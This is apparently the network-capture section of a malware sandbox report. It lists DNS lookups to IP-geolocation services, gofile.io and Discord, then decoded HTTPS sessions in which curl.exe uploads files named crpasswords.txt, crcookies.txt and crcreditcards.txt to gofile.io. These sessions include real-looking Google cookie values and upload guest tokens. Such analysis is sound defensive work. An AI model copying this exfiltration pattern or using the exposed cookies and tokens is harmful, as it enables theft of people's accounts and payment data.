Dec 13, 2024 08:45:35.594175100 CET	443	49768	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:35.594804049 CET	49768	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:35.594835043 CET	443	49768	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:35.595993996 CET	443	49768	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:35.596160889 CET	49768	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:35.597039938 CET	49768	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:35.597193956 CET	49768	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:35.598376036 CET	49769	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:35.598438978 CET	443	49769	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:35.598509073 CET	49769	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:35.598865032 CET	49769	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:35.598880053 CET	443	49769	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:36.809669971 CET	443	49769	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:36.810455084 CET	49769	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:36.810483932 CET	443	49769	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:36.811542988 CET	443	49769	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:36.811611891 CET	49769	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:36.812526941 CET	49769	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:36.812661886 CET	49769	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:36.813872099 CET	49771	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:36.813908100 CET	443	49771	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:36.813985109 CET	49771	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:36.814291000 CET	49771	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:36.814302921 CET	443	49771	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:38.023191929 CET	443	49771	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:38.023834944 CET	49771	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:38.023855925 CET	443	49771	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:38.024945021 CET	443	49771	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:38.025019884 CET	49771	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:38.026050091 CET	49771	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:38.026233912 CET	443	49771	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:38.026242018 CET	49771	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:38.026294947 CET	49771	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:38.027597904 CET	49772	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:38.027653933 CET	443	49772	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:38.027729034 CET	49772	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:38.028215885 CET	49772	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:38.028232098 CET	443	49772	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:39.238759041 CET	443	49772	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:39.239228010 CET	49772	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:39.239293098 CET	443	49772	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:39.240506887 CET	443	49772	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:39.240581036 CET	49772	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:39.241571903 CET	49772	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:39.241719007 CET	49772	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:39.242907047 CET	49773	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:39.242964983 CET	443	49773	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:39.243037939 CET	49773	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:39.243407965 CET	49773	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:39.243422031 CET	443	49773	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:40.451792002 CET	443	49773	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:40.452804089 CET	49773	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:40.452835083 CET	443	49773	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:40.454838991 CET	443	49773	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:40.454906940 CET	49773	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:40.456012011 CET	49773	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:40.456168890 CET	49773	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:40.457406998 CET	49774	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:40.457457066 CET	443	49774	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:40.457524061 CET	49774	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:40.457861900 CET	49774	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:40.457875013 CET	443	49774	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:41.668940067 CET	443	49774	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:41.669414997 CET	49774	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:41.669440985 CET	443	49774	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:41.670465946 CET	443	49774	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:41.670541048 CET	49774	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:41.678972006 CET	49774	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:41.679188967 CET	49774	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:41.883955002 CET	49775	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:41.884067059 CET	443	49775	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:41.884210110 CET	49775	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:41.884802103 CET	49775	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:41.884841919 CET	443	49775	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:43.095101118 CET	443	49775	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:43.141061068 CET	49775	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:43.151331902 CET	49775	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:43.151345968 CET	443	49775	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:43.152710915 CET	443	49775	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:43.152761936 CET	49775	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:43.154345036 CET	49775	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:43.154509068 CET	49775	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:43.155653000 CET	49776	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:43.155702114 CET	443	49776	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:43.155777931 CET	49776	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:43.156100035 CET	49776	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:43.156111002 CET	443	49776	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:44.483383894 CET	443	49776	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:44.484019995 CET	49776	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:44.484040022 CET	443	49776	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:44.485388041 CET	443	49776	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:44.485462904 CET	49776	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:44.486588955 CET	49776	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:44.486742973 CET	443	49776	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:44.486747980 CET	49776	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:44.486799955 CET	49776	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:44.488053083 CET	49777	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:44.488090992 CET	443	49777	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:44.488162994 CET	49777	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:44.488521099 CET	49777	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:44.488528013 CET	443	49777	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:45.699134111 CET	443	49777	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:45.700010061 CET	49777	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:45.700017929 CET	443	49777	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:45.701102972 CET	443	49777	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:45.701163054 CET	49777	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:45.702362061 CET	49777	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:45.702533007 CET	443	49777	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:45.702584028 CET	49777	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:45.702848911 CET	49777	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:45.703881025 CET	49778	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:45.703937054 CET	443	49778	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:45.704056025 CET	49778	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:45.704387903 CET	49778	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:45.704405069 CET	443	49778	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:46.912693977 CET	443	49778	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:46.913183928 CET	49778	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:46.913204908 CET	443	49778	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:46.914299965 CET	443	49778	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:46.914360046 CET	49778	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:46.915492058 CET	49778	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:46.915640116 CET	49778	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:46.915646076 CET	443	49778	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:46.915693045 CET	49778	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:46.916836977 CET	49779	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:46.916872025 CET	443	49779	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:46.916938066 CET	49779	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:46.917295933 CET	49779	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:46.917304039 CET	443	49779	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:48.395620108 CET	443	49779	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:48.396243095 CET	49779	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:48.396255016 CET	443	49779	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:48.397389889 CET	443	49779	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:48.397470951 CET	49779	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:48.398622036 CET	49779	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:48.398770094 CET	49779	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:48.399926901 CET	49780	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:48.399976015 CET	443	49780	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:48.400053978 CET	49780	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:48.400409937 CET	49780	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:48.400424957 CET	443	49780	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:49.675442934 CET	443	49780	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:49.676127911 CET	49780	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:49.676156998 CET	443	49780	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:49.677232027 CET	443	49780	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:49.677324057 CET	49780	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:49.678379059 CET	49780	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:49.678522110 CET	49780	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:49.680124998 CET	49781	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:49.680241108 CET	443	49781	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:49.680342913 CET	49781	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:49.680726051 CET	49781	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:49.680753946 CET	443	49781	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:50.896471977 CET	443	49781	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:50.897646904 CET	49781	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:50.897671938 CET	443	49781	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:50.900363922 CET	443	49781	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:50.900428057 CET	49781	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:50.903636932 CET	49781	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:50.903948069 CET	49781	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:50.906065941 CET	49782	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:50.906114101 CET	443	49782	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:50.906186104 CET	49782	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:50.907120943 CET	49782	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:50.907129049 CET	443	49782	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:52.116687059 CET	443	49782	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:52.117324114 CET	49782	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:52.117341995 CET	443	49782	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:52.118247032 CET	443	49782	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:52.118304968 CET	49782	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:52.119807005 CET	49782	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:52.119966030 CET	49782	443	192.168.2.8	162.159.138.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:44:55.654860973 CET	59434	53	192.168.2.8	1.1.1.1
Dec 13, 2024 08:44:55.792459011 CET	53	59434	1.1.1.1	192.168.2.8
Dec 13, 2024 08:44:57.036027908 CET	53343	53	192.168.2.8	1.1.1.1
Dec 13, 2024 08:44:57.174575090 CET	53	53343	1.1.1.1	192.168.2.8
Dec 13, 2024 08:44:58.569268942 CET	54699	53	192.168.2.8	1.1.1.1
Dec 13, 2024 08:44:58.707298994 CET	53	54699	1.1.1.1	192.168.2.8
Dec 13, 2024 08:45:00.927211046 CET	55688	53	192.168.2.8	1.1.1.1
Dec 13, 2024 08:45:00.962930918 CET	59683	53	192.168.2.8	1.1.1.1
Dec 13, 2024 08:45:01.100723028 CET	53	59683	1.1.1.1	192.168.2.8
Dec 13, 2024 08:45:01.159646988 CET	53	55688	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 08:44:55.654860973 CET	192.168.2.8	1.1.1.1	0x2043	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:44:57.036027908 CET	192.168.2.8	1.1.1.1	0x39a0	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:44:58.569268942 CET	192.168.2.8	1.1.1.1	0x302e	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:45:00.927211046 CET	192.168.2.8	1.1.1.1	0x546	Standard query (0)	store4.gofile.io	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:45:00.962930918 CET	192.168.2.8	1.1.1.1	0x63be	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 08:44:55.792459011 CET	1.1.1.1	192.168.2.8	0x2043	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:44:55.792459011 CET	1.1.1.1	192.168.2.8	0x2043	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:44:55.792459011 CET	1.1.1.1	192.168.2.8	0x2043	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:44:57.174575090 CET	1.1.1.1	192.168.2.8	0x39a0	No error (0)	api.gofile.io	45.112.123.126	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:44:58.707298994 CET	1.1.1.1	192.168.2.8	0x302e	No error (0)	geolocation-db.com	159.89.102.253	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:45:01.100723028 CET	1.1.1.1	192.168.2.8	0x63be	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:45:01.100723028 CET	1.1.1.1	192.168.2.8	0x63be	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:45:01.100723028 CET	1.1.1.1	192.168.2.8	0x63be	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:45:01.100723028 CET	1.1.1.1	192.168.2.8	0x63be	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:45:01.100723028 CET	1.1.1.1	192.168.2.8	0x63be	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:45:01.159646988 CET	1.1.1.1	192.168.2.8	0x546	No error (0)	store4.gofile.io	31.14.70.245	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

store4.gofile.io

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49715	31.14.70.245	443	8704	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:45:02 UTC	198	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 193 Content-Type: multipart/form-data; boundary=------------------------cce6b149417beeab
2024-12-13 07:45:02 UTC	193	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 63 65 36 62 31 34 39 34 31 37 62 65 65 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 70 61 73 73 77 6f 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 63 65 36 62 31 34 39 34 31 37 62 65 65 61 62 2d 2d 0d 0a Data Ascii: --------------------------cce6b149417beeabContent-Disposition: form-data; name="file"; filename="crpasswords.txt"Content-Type: text/plain--------------------------cce6b149417beeab--
2024-12-13 07:45:03 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Fri, 13 Dec 2024 07:45:03 GMT Content-Type: application/json Content-Length: 893 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-13 07:45:03 UTC	893	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 30 33 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 5a 62 55 33 64 66 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 56 6f 44 31 45 31 77 51 7a 78 75 44 58 65 49 30 63 6c 4f 4b 4d 52 52 70 51 32 52 57 54 6d 35 66 22 2c 22 69 64 22 3a 22 39 30 63 62 34 30 30 63 2d 30 33 38 34 2d 34 61 37 34 2d 62 35 32 64 2d 64 34 38 38 33 35 34 37 38 30 65 63 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 30 33 2c Data Ascii: {"data":{"createTime":1734075903,"downloadPage":"https://gofile.io/d/ZbU3df","guestToken":"VoD1E1wQzxuDXeI0clOKMRRpQ2RWTm5f","id":"90cb400c-0384-4a74-b52d-d488354780ec","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1734075903,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49720	31.14.70.245	443	9964	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:45:05 UTC	198	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 466 Content-Type: multipart/form-data; boundary=------------------------c8a82bb20e1e8a00
2024-12-13 07:45:05 UTC	466	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 38 61 38 32 62 62 32 30 65 31 65 38 61 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 46 41 4c 53 45 09 32 35 39 37 35 37 33 34 35 36 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 35 2d 30 38 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 46 41 4c 53 45 09 32 35 39 37 35 37 33 34 35 36 09 4e 49 44 09 35 31 31 3d 6f 72 63 53 49 6e 6f 5a 42 62 Data Ascii: --------------------------c8a82bb20e1e8a00Content-Disposition: form-data; name="file"; filename="crcookies.txt"Content-Type: text/plain.google.comTRUE/FALSE25975734561P_JAR2023-10-05-08.google.comTRUE/FALSE2597573456NID511=orcSInoZBb
2024-12-13 07:45:05 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Fri, 13 Dec 2024 07:45:05 GMT Content-Type: application/json Content-Length: 437 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-13 07:45:05 UTC	437	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 30 35 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 39 79 74 41 39 4b 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 39 52 74 63 38 7a 33 39 59 71 57 78 39 79 32 4d 74 4c 34 47 4c 37 49 74 77 32 53 55 33 67 35 37 22 2c 22 69 64 22 3a 22 38 35 36 66 62 61 66 66 2d 62 61 31 32 2d 34 36 39 38 2d 39 32 64 64 2d 65 66 63 31 31 31 32 36 32 33 66 36 22 2c 22 6d 64 35 22 3a 22 61 62 37 62 33 31 34 39 37 61 38 39 63 65 65 35 38 66 66 37 66 34 32 30 31 32 66 35 61 30 36 32 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 74 61 62 2d 73 65 70 61 72 61 74 65 64 2d 76 61 6c 75 65 73 22 2c 22 6d 6f 64 54 69 Data Ascii: {"data":{"createTime":1734075905,"downloadPage":"https://gofile.io/d/9ytA9K","guestToken":"9Rtc8z39YqWx9y2MtL4GL7Itw2SU3g57","id":"856fbaff-ba12-4698-92dd-efc1112623f6","md5":"ab7b31497a89cee58ff7f42012f5a062","mimetype":"text/tab-separated-values","modTi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49725	31.14.70.245	443	10068	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:45:07 UTC	198	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 195 Content-Type: multipart/form-data; boundary=------------------------2eb4bb3cff072ce0
2024-12-13 07:45:07 UTC	195	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 65 62 34 62 62 33 63 66 66 30 37 32 63 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 72 65 64 69 74 63 61 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 65 62 34 62 62 33 63 66 66 30 37 32 63 65 30 2d 2d 0d 0a Data Ascii: --------------------------2eb4bb3cff072ce0Content-Disposition: form-data; name="file"; filename="crcreditcards.txt"Content-Type: text/plain--------------------------2eb4bb3cff072ce0--
2024-12-13 07:45:08 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Fri, 13 Dec 2024 07:45:08 GMT Content-Type: application/json Content-Length: 895 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-13 07:45:08 UTC	895	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 30 38 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 62 46 42 4b 58 31 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 7a 54 74 56 36 78 44 6a 57 71 54 35 56 4d 48 37 65 45 6a 73 4c 76 39 39 79 77 6b 56 70 45 55 61 22 2c 22 69 64 22 3a 22 61 61 35 65 32 34 34 38 2d 38 30 33 30 2d 34 63 36 33 2d 62 65 34 63 2d 35 65 66 35 32 61 37 37 35 32 63 61 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 30 38 2c Data Ascii: 